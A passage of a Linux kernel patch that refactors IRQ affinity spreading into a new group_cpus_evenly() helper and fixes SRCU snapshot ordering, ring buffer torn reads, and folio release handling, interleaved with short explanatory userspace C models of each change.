+-				      unsigned int firstvec,
+-				      cpumask_var_t *node_to_cpumask,
+-				      const struct cpumask *cpu_mask,
+-				      struct cpumask *nmsk,
+-				      struct irq_affinity_desc *masks)
+-{
+-	unsigned int i, n, nodes, cpus_per_vec, extra_vecs, done = 0;
+-	unsigned int last_affv = firstvec + numvecs;
+-	unsigned int curvec = startvec;
+-	nodemask_t nodemsk = NODE_MASK_NONE;
+-	struct node_vectors *node_vectors;
+-
+-	if (cpumask_empty(cpu_mask))
+-		return 0;
+-
+-	nodes = get_nodes_in_cpumask(node_to_cpumask, cpu_mask, &nodemsk);
+-
+-	/*
+-	 * If the number of nodes in the mask is greater than or equal the
+-	 * number of vectors we just spread the vectors across the nodes.
+-	 */
+-	if (numvecs <= nodes) {
+-		for_each_node_mask(n, nodemsk) {
+-			/* Ensure that only CPUs which are in both masks are set */
+-			cpumask_and(nmsk, cpu_mask, node_to_cpumask[n]);
+-			cpumask_or(&masks[curvec].mask, &masks[curvec].mask, nmsk);
+-			if (++curvec == last_affv)
+-				curvec = firstvec;
+-		}
+-		return numvecs;
+-	}
+-
+-	node_vectors = kcalloc(nr_node_ids,
+-			       sizeof(struct node_vectors),
+-			       GFP_KERNEL);
+-	if (!node_vectors)
+-		return -ENOMEM;
+-
+-	/* allocate vector number for each node */
+-	alloc_nodes_vectors(numvecs, node_to_cpumask, cpu_mask,
+-			    nodemsk, nmsk, node_vectors);
+-
+-	for (i = 0; i < nr_node_ids; i++) {
+-		unsigned int ncpus, v;
+-		struct node_vectors *nv = &node_vectors[i];
+-
+-		if (nv->nvectors == UINT_MAX)
+-			continue;
+-
+-		/* Get the cpus on this node which are in the mask */
+-		cpumask_and(nmsk, cpu_mask, node_to_cpumask[nv->id]);
+-		ncpus = cpumask_weight(nmsk);
+-		if (!ncpus)
+-			continue;
+-
+-		WARN_ON_ONCE(nv->nvectors > ncpus);
+-
+-		/* Account for rounding errors */
+-		extra_vecs = ncpus - nv->nvectors * (ncpus / nv->nvectors);
+-
+-		/* Spread allocated vectors on CPUs of the current node */
+-		for (v = 0; v < nv->nvectors; v++, curvec++) {
+-			cpus_per_vec = ncpus / nv->nvectors;
+-
+-			/* Account for extra vectors to compensate rounding errors */
+-			if (extra_vecs) {
+-				cpus_per_vec++;
+-				--extra_vecs;
+-			}
+-
+-			/*
+-			 * wrapping has to be considered given 'startvec'
+-			 * may start anywhere
+-			 */
+-			if (curvec >= last_affv)
+-				curvec = firstvec;
+-			irq_spread_init_one(&masks[curvec].mask, nmsk,
+-						cpus_per_vec);
+-		}
+-		done += nv->nvectors;
+-	}
+-	kfree(node_vectors);
+-	return done;
+-}
+-
+-/*
+- * build affinity in two stages:
+- *	1) spread present CPU on these vectors
+- *	2) spread other possible CPUs on these vectors
+- */
+-static int irq_build_affinity_masks(unsigned int startvec, unsigned int numvecs,
+-				    unsigned int firstvec,
+-				    struct irq_affinity_desc *masks)
+-{
+-	unsigned int curvec = startvec, nr_present = 0, nr_others = 0;
+-	cpumask_var_t *node_to_cpumask;
+-	cpumask_var_t nmsk, npresmsk;
+-	int ret = -ENOMEM;
+-
+-	if (!zalloc_cpumask_var(&nmsk, GFP_KERNEL))
+-		return ret;
+-
+-	if (!zalloc_cpumask_var(&npresmsk, GFP_KERNEL))
+-		goto fail_nmsk;
+-
+-	node_to_cpumask = alloc_node_to_cpumask();
+-	if (!node_to_cpumask)
+-		goto fail_npresmsk;
+-
+-	/* Stabilize the cpumasks */
+-	cpus_read_lock();
+-	build_node_to_cpumask(node_to_cpumask);
+-
+-	/* Spread on present CPUs starting from affd->pre_vectors */
+-	ret = __irq_build_affinity_masks(curvec, numvecs, firstvec,
+-					 node_to_cpumask, cpu_present_mask,
+-					 nmsk, masks);
+-	if (ret < 0)
+-		goto fail_build_affinity;
+-	nr_present = ret;
+-
+-	/*
+-	 * Spread on non present CPUs starting from the next vector to be
+-	 * handled. If the spreading of present CPUs already exhausted the
+-	 * vector space, assign the non present CPUs to the already spread
+-	 * out vectors.
+-	 */
+-	if (nr_present >= numvecs)
+-		curvec = firstvec;
+-	else
+-		curvec = firstvec + nr_present;
+-	cpumask_andnot(npresmsk, cpu_possible_mask, cpu_present_mask);
+-	ret = __irq_build_affinity_masks(curvec, numvecs, firstvec,
+-					 node_to_cpumask, npresmsk, nmsk,
+-					 masks);
+-	if (ret >= 0)
+-		nr_others = ret;
+-
+- fail_build_affinity:
+-	cpus_read_unlock();
+-
+-	if (ret >= 0)
+-		WARN_ON(nr_present + nr_others < numvecs);
+-
+-	free_node_to_cpumask(node_to_cpumask);
+-
+- fail_npresmsk:
+-	free_cpumask_var(npresmsk);
+-
+- fail_nmsk:
+-	free_cpumask_var(nmsk);
+-	return ret < 0 ? ret : 0;
+-}
++#include <linux/group_cpus.h>
+ 
+ static void default_calc_sets(struct irq_affinity *affd, unsigned int affvecs)
+ {
+@@ -461,14 +70,18 @@ irq_create_affinity_masks(unsigned int nvecs, struct irq_affinity *affd)
+ 	 */
+ 	for (i = 0, usedvecs = 0; i < affd->nr_sets; i++) {
+ 		unsigned int this_vecs = affd->set_size[i];
+-		int ret;
++		int j;
++		struct cpumask *result = group_cpus_evenly(this_vecs);
+ 
+-		ret = irq_build_affinity_masks(curvec, this_vecs,
+-					       curvec, masks);
+-		if (ret) {
++		if (!result) {
+ 			kfree(masks);
+ 			return NULL;
+ 		}
++
++		for (j = 0; j < this_vecs; j++)
++			cpumask_copy(&masks[curvec + j].mask, &result[j]);
++		kfree(result);
++
+ 		curvec += this_vecs;
+ 		usedvecs += this_vecs;
+ 	}
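
The hunk above reduces the IRQ affinity code to a thin consumer of group_cpus_evenly(): allocate the groups, copy each group mask into the per-vector descriptor, free the array. A userspace model of that caller pattern, with plain bitmasks standing in for struct cpumask and a made-up round-robin grouping in place of the real spreading:

/* Userspace model of the new caller pattern in irq_create_affinity_masks(). */
#include <stdio.h>
#include <stdlib.h>

struct toy_desc { unsigned long mask; };

/* stand-in for group_cpus_evenly(): round-robin 8 CPUs into groups */
static unsigned long *toy_group_cpus_evenly(unsigned int numgrps)
{
	unsigned long *masks = calloc(numgrps, sizeof(*masks));

	if (!masks)
		return NULL;
	for (int cpu = 0; cpu < 8; cpu++)
		masks[cpu % numgrps] |= 1UL << cpu;
	return masks;
}

int main(void)
{
	unsigned int this_vecs = 3, curvec = 0;
	struct toy_desc desc[3] = {0};
	unsigned long *result = toy_group_cpus_evenly(this_vecs);

	if (!result)
		return 1;	/* the caller above frees masks and bails */

	for (unsigned int j = 0; j < this_vecs; j++)
		desc[curvec + j].mask = result[j];	/* cpumask_copy() */
	free(result);					/* kfree(result) */

	for (unsigned int j = 0; j < this_vecs; j++)
		printf("vec %u: %#lx\n", j, desc[j].mask);
	return 0;
}
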
+diff --git a/kernel/rcu/srcutree.c b/kernel/rcu/srcutree.c
+index 8fdf076720384..929dcbc04d29c 100644
+--- a/kernel/rcu/srcutree.c
++++ b/kernel/rcu/srcutree.c
+@@ -1100,10 +1100,37 @@ static unsigned long srcu_gp_start_if_needed(struct srcu_struct *ssp,
+ 	spin_lock_irqsave_sdp_contention(sdp, &flags);
+ 	if (rhp)
+ 		rcu_segcblist_enqueue(&sdp->srcu_cblist, rhp);
++	/*
++	 * The snapshot for acceleration must be taken _before_ the read of the
++	 * current gp sequence used for advancing, otherwise advancing may fail
++	 * and acceleration may then fail too.
++	 *
++	 * This could happen if:
++	 *
++	 *  1) The RCU_WAIT_TAIL segment has callbacks (gp_num = X + 4) and the
++	 *     RCU_NEXT_READY_TAIL also has callbacks (gp_num = X + 8).
++	 *
++	 *  2) The grace period for RCU_WAIT_TAIL is seen as started but not
++	 *     completed so rcu_seq_current() returns X + SRCU_STATE_SCAN1.
++	 *
++	 *  3) This value is passed to rcu_segcblist_advance() which can't move
++	 *     any segment forward and fails.
++	 *
++	 *  4) srcu_gp_start_if_needed() still proceeds with callback acceleration.
++	 *     But then the call to rcu_seq_snap() observes the grace period for the
++	 *     RCU_WAIT_TAIL segment as completed and the subsequent one for the
++	 *     RCU_NEXT_READY_TAIL segment as started (ie: X + 4 + SRCU_STATE_SCAN1)
++	 *     so it returns a snapshot of the next grace period, which is X + 12.
++	 *
++	 *  5) The value of X + 12 is passed to rcu_segcblist_accelerate() but the
++	 *     freshly enqueued callback in RCU_NEXT_TAIL can't move to
++	 *     RCU_NEXT_READY_TAIL which already has callbacks for a previous grace
++	 *     period (gp_num = X + 8). So acceleration fails.
++	 */
++	s = rcu_seq_snap(&ssp->srcu_gp_seq);
+ 	rcu_segcblist_advance(&sdp->srcu_cblist,
+ 			      rcu_seq_current(&ssp->srcu_gp_seq));
+-	s = rcu_seq_snap(&ssp->srcu_gp_seq);
+-	(void)rcu_segcblist_accelerate(&sdp->srcu_cblist, s);
++	WARN_ON_ONCE(!rcu_segcblist_accelerate(&sdp->srcu_cblist, s) && rhp);
+ 	if (ULONG_CMP_LT(sdp->srcu_gp_seq_needed, s)) {
+ 		sdp->srcu_gp_seq_needed = s;
+ 		needgp = true;
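
A toy model of the ordering the new comment describes, loosely based on the sequence arithmetic in kernel/rcu/rcu.h (two low state bits per grace-period number); everything else here is simplified for illustration. Taking the snapshot after the grace period advances overshoots by a full period, which is exactly what the reordering above prevents.

/* Toy model: why the snapshot must be taken before the advance. */
#include <stdio.h>

#define SEQ_STATE_MASK 0x3UL

static unsigned long seq_snap(unsigned long seq)
{
	/* first gp number at which a full grace period is guaranteed */
	return (seq + 2 * SEQ_STATE_MASK + 1) & ~SEQ_STATE_MASK;
}

int main(void)
{
	unsigned long gp_seq = 1;	/* X + SRCU_STATE_SCAN1, gp running */

	/* correct order: snapshot first ... */
	unsigned long s = seq_snap(gp_seq);

	/* ... then the gp completes and the next one starts */
	gp_seq = 5;			/* X + 4 + SRCU_STATE_SCAN1 */

	/* a late snapshot overshoots by one full grace period */
	printf("early snap %lu vs late snap %lu\n", s, seq_snap(gp_seq));
	return 0;
}
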
+diff --git a/kernel/trace/ring_buffer.c b/kernel/trace/ring_buffer.c
+index 06d52525407b8..71cad4f1323c6 100644
+--- a/kernel/trace/ring_buffer.c
++++ b/kernel/trace/ring_buffer.c
+@@ -646,8 +646,8 @@ static inline bool __rb_time_read(rb_time_t *t, u64 *ret, unsigned long *cnt)
+ 
+ 	*cnt = rb_time_cnt(top);
+ 
+-	/* If top and msb counts don't match, this interrupted a write */
+-	if (*cnt != rb_time_cnt(msb))
++	/* If top, msb or bottom counts don't match, this interrupted a write */
++	if (*cnt != rb_time_cnt(msb) || *cnt != rb_time_cnt(bottom))
+ 		return false;
+ 
+ 	/* The shift to msb will lose its cnt bits */
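
The fix above extends the torn-read check to all three words of the split timestamp. A userspace sketch of the underlying idea: a value split across several words, each tagged with the same small counter, lets a lockless reader detect that a writer intervened mid-update. The field layout below is illustrative, not the ring buffer's actual encoding.

/* Userspace sketch of detecting a torn read via replicated counters. */
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>

#define CNT_SHIFT 30

struct split_time { uint32_t top, bottom, msb; };

static unsigned cnt(uint32_t w) { return w >> CNT_SHIFT; }

static bool read_consistent(const struct split_time *t)
{
	unsigned c = cnt(t->top);

	/* if top, msb or bottom counts don't match, a write intervened */
	return c == cnt(t->msb) && c == cnt(t->bottom);
}

int main(void)
{
	struct split_time torn = {
		.top    = 1U << CNT_SHIFT,	/* written with cnt 1 ... */
		.bottom = 2U << CNT_SHIFT,	/* ... interrupted, cnt 2 */
		.msb    = 1U << CNT_SHIFT,
	};

	printf("consistent: %d\n", read_consistent(&torn));
	return 0;
}
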
+diff --git a/lib/Makefile b/lib/Makefile
+index 5ffe72ec99797..6f1611d053e6a 100644
+--- a/lib/Makefile
++++ b/lib/Makefile
+@@ -361,6 +361,8 @@ obj-$(CONFIG_SBITMAP) += sbitmap.o
+ 
+ obj-$(CONFIG_PARMAN) += parman.o
+ 
++obj-y += group_cpus.o
++
+ # GCC library routines
+ obj-$(CONFIG_GENERIC_LIB_ASHLDI3) += ashldi3.o
+ obj-$(CONFIG_GENERIC_LIB_ASHRDI3) += ashrdi3.o
+diff --git a/lib/group_cpus.c b/lib/group_cpus.c
+new file mode 100644
+index 0000000000000..0292611901b8b
+--- /dev/null
++++ b/lib/group_cpus.c
+@@ -0,0 +1,438 @@
++// SPDX-License-Identifier: GPL-2.0
++/*
++ * Copyright (C) 2016 Thomas Gleixner.
++ * Copyright (C) 2016-2017 Christoph Hellwig.
++ */
++#include <linux/kernel.h>
++#include <linux/slab.h>
++#include <linux/cpu.h>
++#include <linux/sort.h>
++#include <linux/group_cpus.h>
++
++#ifdef CONFIG_SMP
++
++static void grp_spread_init_one(struct cpumask *irqmsk, struct cpumask *nmsk,
++				unsigned int cpus_per_grp)
++{
++	const struct cpumask *siblmsk;
++	int cpu, sibl;
++
++	for ( ; cpus_per_grp > 0; ) {
++		cpu = cpumask_first(nmsk);
++
++		/* Should not happen, but I'm too lazy to think about it */
++		if (cpu >= nr_cpu_ids)
++			return;
++
++		cpumask_clear_cpu(cpu, nmsk);
++		cpumask_set_cpu(cpu, irqmsk);
++		cpus_per_grp--;
++
++		/* If the cpu has siblings, use them first */
++		siblmsk = topology_sibling_cpumask(cpu);
++		for (sibl = -1; cpus_per_grp > 0; ) {
++			sibl = cpumask_next(sibl, siblmsk);
++			if (sibl >= nr_cpu_ids)
++				break;
++			if (!cpumask_test_and_clear_cpu(sibl, nmsk))
++				continue;
++			cpumask_set_cpu(sibl, irqmsk);
++			cpus_per_grp--;
++		}
++	}
++}
++
++static cpumask_var_t *alloc_node_to_cpumask(void)
++{
++	cpumask_var_t *masks;
++	int node;
++
++	masks = kcalloc(nr_node_ids, sizeof(cpumask_var_t), GFP_KERNEL);
++	if (!masks)
++		return NULL;
++
++	for (node = 0; node < nr_node_ids; node++) {
++		if (!zalloc_cpumask_var(&masks[node], GFP_KERNEL))
++			goto out_unwind;
++	}
++
++	return masks;
++
++out_unwind:
++	while (--node >= 0)
++		free_cpumask_var(masks[node]);
++	kfree(masks);
++	return NULL;
++}
++
++static void free_node_to_cpumask(cpumask_var_t *masks)
++{
++	int node;
++
++	for (node = 0; node < nr_node_ids; node++)
++		free_cpumask_var(masks[node]);
++	kfree(masks);
++}
++
++static void build_node_to_cpumask(cpumask_var_t *masks)
++{
++	int cpu;
++
++	for_each_possible_cpu(cpu)
++		cpumask_set_cpu(cpu, masks[cpu_to_node(cpu)]);
++}
++
++static int get_nodes_in_cpumask(cpumask_var_t *node_to_cpumask,
++				const struct cpumask *mask, nodemask_t *nodemsk)
++{
++	int n, nodes = 0;
++
++	/* Calculate the number of nodes in the supplied affinity mask */
++	for_each_node(n) {
++		if (cpumask_intersects(mask, node_to_cpumask[n])) {
++			node_set(n, *nodemsk);
++			nodes++;
++		}
++	}
++	return nodes;
++}
++
++struct node_groups {
++	unsigned id;
++
++	union {
++		unsigned ngroups;
++		unsigned ncpus;
++	};
++};
++
++static int ncpus_cmp_func(const void *l, const void *r)
++{
++	const struct node_groups *ln = l;
++	const struct node_groups *rn = r;
++
++	return ln->ncpus - rn->ncpus;
++}
++
++/*
++ * Allocate group number for each node, so that for each node:
++ *
++ * 1) the allocated number is >= 1
++ *
++ * 2) the allocated number is <= active CPU number of this node
++ *
++ * The actual allocated total groups may be less than @numgrps when
++ * active total CPU number is less than @numgrps.
++ *
++ * Active CPUs means the CPUs in '@cpu_mask AND @node_to_cpumask[]'
++ * for each node.
++ */
++static void alloc_nodes_groups(unsigned int numgrps,
++			       cpumask_var_t *node_to_cpumask,
++			       const struct cpumask *cpu_mask,
++			       const nodemask_t nodemsk,
++			       struct cpumask *nmsk,
++			       struct node_groups *node_groups)
++{
++	unsigned n, remaining_ncpus = 0;
++
++	for (n = 0; n < nr_node_ids; n++) {
++		node_groups[n].id = n;
++		node_groups[n].ncpus = UINT_MAX;
++	}
++
++	for_each_node_mask(n, nodemsk) {
++		unsigned ncpus;
++
++		cpumask_and(nmsk, cpu_mask, node_to_cpumask[n]);
++		ncpus = cpumask_weight(nmsk);
++
++		if (!ncpus)
++			continue;
++		remaining_ncpus += ncpus;
++		node_groups[n].ncpus = ncpus;
++	}
++
++	numgrps = min_t(unsigned, remaining_ncpus, numgrps);
++
++	sort(node_groups, nr_node_ids, sizeof(node_groups[0]),
++	     ncpus_cmp_func, NULL);
++
++	/*
++	 * Allocate groups for each node according to the ratio of this
++	 * node's nr_cpus to remaining un-assigned ncpus. 'numgrps' is
++	 * bigger than number of active numa nodes. Always start the
++	 * allocation from the node with minimized nr_cpus.
++	 *
++	 * This way guarantees that each active node gets allocated at
++	 * least one group, and the theory is simple: over-allocation
++	 * is only done when this node is assigned by one group, so
++	 * other nodes will be allocated >= 1 groups, since 'numgrps' is
++	 * bigger than number of numa nodes.
++	 *
++	 * One perfect invariant is that number of allocated groups for
++	 * each node is <= CPU count of this node:
++	 *
++	 * 1) suppose there are two nodes: A and B
++	 * 	ncpu(X) is CPU count of node X
++	 * 	grps(X) is the group count allocated to node X via this
++	 * 	algorithm
++	 *
++	 * 	ncpu(A) <= ncpu(B)
++	 * 	ncpu(A) + ncpu(B) = N
++	 * 	grps(A) + grps(B) = G
++	 *
++	 * 	grps(A) = max(1, round_down(G * ncpu(A) / N))
++	 * 	grps(B) = G - grps(A)
++	 *
++	 * 	both N and G are integer, and 2 <= G <= N, suppose
++	 * 	G = N - delta, and 0 <= delta <= N - 2
++	 *
++	 * 2) obviously grps(A) <= ncpu(A) because:
++	 *
++	 * 	if grps(A) is 1, then grps(A) <= ncpu(A) given
++	 * 	ncpu(A) >= 1
++	 *
++	 * 	otherwise,
++	 * 		grps(A) <= G * ncpu(A) / N <= ncpu(A), given G <= N
++	 *
++	 * 3) prove how grps(B) <= ncpu(B):
++	 *
++	 * 	if round_down(G * ncpu(A) / N) == 0, grps(B) won't be
++	 * 	over-allocated, so grps(B) <= ncpu(B),
++	 *
++	 * 	otherwise:
++	 *
++	 * 	grps(A) =
++	 * 		round_down(G * ncpu(A) / N) =
++	 * 		round_down((N - delta) * ncpu(A) / N) =
++	 * 		round_down((N * ncpu(A) - delta * ncpu(A)) / N)	 >=
++	 * 		round_down((N * ncpu(A) - delta * N) / N)	 =
++	 * 		ncpu(A) - delta
++	 *
++	 * 	then:
++	 *
++	 * 	grps(A) - G >= ncpu(A) - delta - G
++	 * 	=>
++	 * 	G - grps(A) <= G + delta - ncpu(A)
++	 * 	=>
++	 * 	grps(B) <= N - ncpu(A)
++	 * 	=>
++	 * 	grps(B) <= ncpu(B)
++	 *
++	 * For nodes >= 3, it can be thought of as one node and another big
++	 * node, given that is exactly how this algorithm is implemented,
++	 * and we always re-calculate 'remaining_ncpus' & 'numgrps', and
++	 * finally for each node X: grps(X) <= ncpu(X).
++	 *
++	 */
++	for (n = 0; n < nr_node_ids; n++) {
++		unsigned ngroups, ncpus;
++
++		if (node_groups[n].ncpus == UINT_MAX)
++			continue;
++
++		WARN_ON_ONCE(numgrps == 0);
++
++		ncpus = node_groups[n].ncpus;
++		ngroups = max_t(unsigned, 1,
++				 numgrps * ncpus / remaining_ncpus);
++		WARN_ON_ONCE(ngroups > ncpus);
++
++		node_groups[n].ngroups = ngroups;
++
++		remaining_ncpus -= ncpus;
++		numgrps -= ngroups;
++	}
++}
++
++static int __group_cpus_evenly(unsigned int startgrp, unsigned int numgrps,
++			       cpumask_var_t *node_to_cpumask,
++			       const struct cpumask *cpu_mask,
++			       struct cpumask *nmsk, struct cpumask *masks)
++{
++	unsigned int i, n, nodes, cpus_per_grp, extra_grps, done = 0;
++	unsigned int last_grp = numgrps;
++	unsigned int curgrp = startgrp;
++	nodemask_t nodemsk = NODE_MASK_NONE;
++	struct node_groups *node_groups;
++
++	if (cpumask_empty(cpu_mask))
++		return 0;
++
++	nodes = get_nodes_in_cpumask(node_to_cpumask, cpu_mask, &nodemsk);
++
++	/*
++	 * If the number of nodes in the mask is greater than or equal to the
++	 * number of groups we just spread the groups across the nodes.
++	 */
++	if (numgrps <= nodes) {
++		for_each_node_mask(n, nodemsk) {
++			/* Ensure that only CPUs which are in both masks are set */
++			cpumask_and(nmsk, cpu_mask, node_to_cpumask[n]);
++			cpumask_or(&masks[curgrp], &masks[curgrp], nmsk);
++			if (++curgrp == last_grp)
++				curgrp = 0;
++		}
++		return numgrps;
++	}
++
++	node_groups = kcalloc(nr_node_ids,
++			       sizeof(struct node_groups),
++			       GFP_KERNEL);
++	if (!node_groups)
++		return -ENOMEM;
++
++	/* allocate group number for each node */
++	alloc_nodes_groups(numgrps, node_to_cpumask, cpu_mask,
++			   nodemsk, nmsk, node_groups);
++	for (i = 0; i < nr_node_ids; i++) {
++		unsigned int ncpus, v;
++		struct node_groups *nv = &node_groups[i];
++
++		if (nv->ngroups == UINT_MAX)
++			continue;
++
++		/* Get the cpus on this node which are in the mask */
++		cpumask_and(nmsk, cpu_mask, node_to_cpumask[nv->id]);
++		ncpus = cpumask_weight(nmsk);
++		if (!ncpus)
++			continue;
++
++		WARN_ON_ONCE(nv->ngroups > ncpus);
++
++		/* Account for rounding errors */
++		extra_grps = ncpus - nv->ngroups * (ncpus / nv->ngroups);
++
++		/* Spread allocated groups on CPUs of the current node */
++		for (v = 0; v < nv->ngroups; v++, curgrp++) {
++			cpus_per_grp = ncpus / nv->ngroups;
++
++			/* Account for extra groups to compensate rounding errors */
++			if (extra_grps) {
++				cpus_per_grp++;
++				--extra_grps;
++			}
++
++			/*
++			 * wrapping has to be considered given 'startgrp'
++			 * may start anywhere
++			 */
++			if (curgrp >= last_grp)
++				curgrp = 0;
++			grp_spread_init_one(&masks[curgrp], nmsk,
++						cpus_per_grp);
++		}
++		done += nv->ngroups;
++	}
++	kfree(node_groups);
++	return done;
++}
++
++/**
++ * group_cpus_evenly - Group all CPUs evenly per NUMA/CPU locality
++ * @numgrps: number of groups
++ *
++ * Return: cpumask array if successful, NULL otherwise. Each element
++ * includes the CPUs assigned to that group
++ *
++ * Try to put close CPUs from viewpoint of CPU and NUMA locality into
++ * same group, and run two-stage grouping:
++ *	1) allocate present CPUs on these groups evenly first
++ *	2) allocate other possible CPUs on these groups evenly
++ *
++ * We guarantee in the resulting grouping that all CPUs are covered, and
++ * no CPU is assigned to multiple groups
++ */
++struct cpumask *group_cpus_evenly(unsigned int numgrps)
++{
++	unsigned int curgrp = 0, nr_present = 0, nr_others = 0;
++	cpumask_var_t *node_to_cpumask;
++	cpumask_var_t nmsk, npresmsk;
++	int ret = -ENOMEM;
++	struct cpumask *masks = NULL;
++
++	if (!zalloc_cpumask_var(&nmsk, GFP_KERNEL))
++		return NULL;
++
++	if (!zalloc_cpumask_var(&npresmsk, GFP_KERNEL))
++		goto fail_nmsk;
++
++	node_to_cpumask = alloc_node_to_cpumask();
++	if (!node_to_cpumask)
++		goto fail_npresmsk;
++
++	masks = kcalloc(numgrps, sizeof(*masks), GFP_KERNEL);
++	if (!masks)
++		goto fail_node_to_cpumask;
++
++	build_node_to_cpumask(node_to_cpumask);
++
++	/*
++	 * Make a local cache of 'cpu_present_mask', so the two stages
++	 * spread can observe consistent 'cpu_present_mask' without holding
++	 * cpu hotplug lock, then we can reduce deadlock risk with cpu
++	 * hotplug code.
++	 *
++	 * CPU hotplug may happen while `cpu_present_mask` is being read, and
++	 * we can live with that: it only affects whether a hotplugged CPU is
++	 * handled in the 1st or the 2nd stage, and either way is correct from
++	 * the API user's viewpoint since the 2-stage spread is merely an
++	 * optimization.
++	 */
++	cpumask_copy(npresmsk, data_race(cpu_present_mask));
++
++	/* grouping present CPUs first */
++	ret = __group_cpus_evenly(curgrp, numgrps, node_to_cpumask,
++				  npresmsk, nmsk, masks);
++	if (ret < 0)
++		goto fail_build_affinity;
++	nr_present = ret;
++
++	/*
++	 * Allocate non present CPUs starting from the next group to be
++	 * handled. If the grouping of present CPUs already exhausted the
++	 * group space, assign the non present CPUs to the already
++	 * allocated groups.
++	 */
++	if (nr_present >= numgrps)
++		curgrp = 0;
++	else
++		curgrp = nr_present;
++	cpumask_andnot(npresmsk, cpu_possible_mask, npresmsk);
++	ret = __group_cpus_evenly(curgrp, numgrps, node_to_cpumask,
++				  npresmsk, nmsk, masks);
++	if (ret >= 0)
++		nr_others = ret;
++
++ fail_build_affinity:
++	if (ret >= 0)
++		WARN_ON(nr_present + nr_others < numgrps);
++
++ fail_node_to_cpumask:
++	free_node_to_cpumask(node_to_cpumask);
++
++ fail_npresmsk:
++	free_cpumask_var(npresmsk);
++
++ fail_nmsk:
++	free_cpumask_var(nmsk);
++	if (ret < 0) {
++		kfree(masks);
++		return NULL;
++	}
++	return masks;
++}
++#else /* CONFIG_SMP */
++struct cpumask *group_cpus_evenly(unsigned int numgrps)
++{
++	struct cpumask *masks = kcalloc(numgrps, sizeof(*masks), GFP_KERNEL);
++
++	if (!masks)
++		return NULL;
++
++	/* assign all CPUs (i.e. cpu 0) to the 1st group only */
++	cpumask_copy(&masks[0], cpu_possible_mask);
++	return masks;
++}
++#endif /* CONFIG_SMP */
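
To make the invariant proved in the long comment concrete, here is a small worked example of the two-node case: grps(A) = max(1, round_down(G * ncpu(A) / N)), grps(B) = G - grps(A), and neither exceeds its node's CPU count. The numbers are chosen arbitrarily.

/* Worked example of the two-node group allocation invariant. */
#include <stdio.h>

int main(void)
{
	unsigned ncpu_a = 3, ncpu_b = 13;	/* N = 16 */
	unsigned N = ncpu_a + ncpu_b, G = 10;	/* 10 groups to place */

	unsigned grps_a = G * ncpu_a / N;	/* round_down(10*3/16) = 1 */
	if (grps_a < 1)
		grps_a = 1;
	unsigned grps_b = G - grps_a;		/* 9 <= ncpu(B) = 13 */

	printf("grps(A)=%u <= %u, grps(B)=%u <= %u\n",
	       grps_a, ncpu_a, grps_b, ncpu_b);
	return 0;
}
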
+diff --git a/mm/filemap.c b/mm/filemap.c
+index 10fe6430693bd..2809b1174f04e 100644
+--- a/mm/filemap.c
++++ b/mm/filemap.c
+@@ -4005,6 +4005,8 @@ bool filemap_release_folio(struct folio *folio, gfp_t gfp)
+ 	struct address_space * const mapping = folio->mapping;
+ 
+ 	BUG_ON(!folio_test_locked(folio));
++	if (!folio_needs_release(folio))
++		return true;
+ 	if (folio_test_writeback(folio))
+ 		return false;
+ 
+diff --git a/mm/huge_memory.c b/mm/huge_memory.c
+index 2753fb54cdf38..59577946735b1 100644
+--- a/mm/huge_memory.c
++++ b/mm/huge_memory.c
+@@ -2694,8 +2694,7 @@ int split_huge_page_to_list(struct page *page, struct list_head *list)
+ 		gfp = current_gfp_context(mapping_gfp_mask(mapping) &
+ 							GFP_RECLAIM_MASK);
+ 
+-		if (folio_test_private(folio) &&
+-				!filemap_release_folio(folio, gfp)) {
++		if (!filemap_release_folio(folio, gfp)) {
+ 			ret = -EBUSY;
+ 			goto out;
+ 		}
+diff --git a/mm/internal.h b/mm/internal.h
+index 6b7ef495b56d3..d01130efce5fb 100644
+--- a/mm/internal.h
++++ b/mm/internal.h
+@@ -163,6 +163,17 @@ static inline void set_page_refcounted(struct page *page)
+ 	set_page_count(page, 1);
+ }
+ 
++/*
++ * Return true if a folio needs ->release_folio() calling upon it.
++ */
++static inline bool folio_needs_release(struct folio *folio)
++{
++	struct address_space *mapping = folio_mapping(folio);
++
++	return folio_has_private(folio) ||
++		(mapping && mapping_release_always(mapping));
++}
++
+ extern unsigned long highest_memmap_pfn;
+ 
+ /*
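
The net effect of this helper, together with the mm/filemap.c hunk earlier, is a new calling convention: filemap_release_folio() now performs the "does this folio need releasing at all?" check itself, so the callers patched throughout this series can drop their own folio_test_private() guards. A userspace model of that contract; all types and fields below are stand-ins.

/* Userspace model of the new filemap_release_folio() contract. */
#include <stdbool.h>
#include <stdio.h>

struct toy_folio { bool has_private; bool release_always; bool busy; };

static bool needs_release(const struct toy_folio *f)
{
	return f->has_private || f->release_always;
}

static bool release_folio(struct toy_folio *f)
{
	if (!needs_release(f))
		return true;	/* nothing to do counts as success */
	return !f->busy;	/* otherwise try to drop private data */
}

int main(void)
{
	struct toy_folio plain = {0};

	/* callers such as migrate or truncate now just call this: */
	printf("released: %d\n", release_folio(&plain));
	return 0;
}
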
+diff --git a/mm/khugepaged.c b/mm/khugepaged.c
+index ef72d3df4b65b..65bd0b105266a 100644
+--- a/mm/khugepaged.c
++++ b/mm/khugepaged.c
+@@ -1818,6 +1818,7 @@ static int collapse_file(struct mm_struct *mm, unsigned long addr,
+ 	xas_set(&xas, start);
+ 	for (index = start; index < end; index++) {
+ 		struct page *page = xas_next(&xas);
++		struct folio *folio;
+ 
+ 		VM_BUG_ON(index != xas.xa_index);
+ 		if (is_shmem) {
+@@ -1844,8 +1845,6 @@ static int collapse_file(struct mm_struct *mm, unsigned long addr,
+ 			}
+ 
+ 			if (xa_is_value(page) || !PageUptodate(page)) {
+-				struct folio *folio;
+-
+ 				xas_unlock_irq(&xas);
+ 				/* swap in or instantiate fallocated page */
+ 				if (shmem_get_folio(mapping->host, index,
+@@ -1933,13 +1932,15 @@ static int collapse_file(struct mm_struct *mm, unsigned long addr,
+ 			goto out_unlock;
+ 		}
+ 
+-		if (page_mapping(page) != mapping) {
++		folio = page_folio(page);
++
++		if (folio_mapping(folio) != mapping) {
+ 			result = SCAN_TRUNCATED;
+ 			goto out_unlock;
+ 		}
+ 
+-		if (!is_shmem && (PageDirty(page) ||
+-				  PageWriteback(page))) {
++		if (!is_shmem && (folio_test_dirty(folio) ||
++				  folio_test_writeback(folio))) {
+ 			/*
+ 			 * khugepaged only works on read-only fd, so this
+ 			 * page is dirty because it hasn't been flushed
+@@ -1949,20 +1950,19 @@ static int collapse_file(struct mm_struct *mm, unsigned long addr,
+ 			goto out_unlock;
+ 		}
+ 
+-		if (isolate_lru_page(page)) {
++		if (folio_isolate_lru(folio)) {
+ 			result = SCAN_DEL_PAGE_LRU;
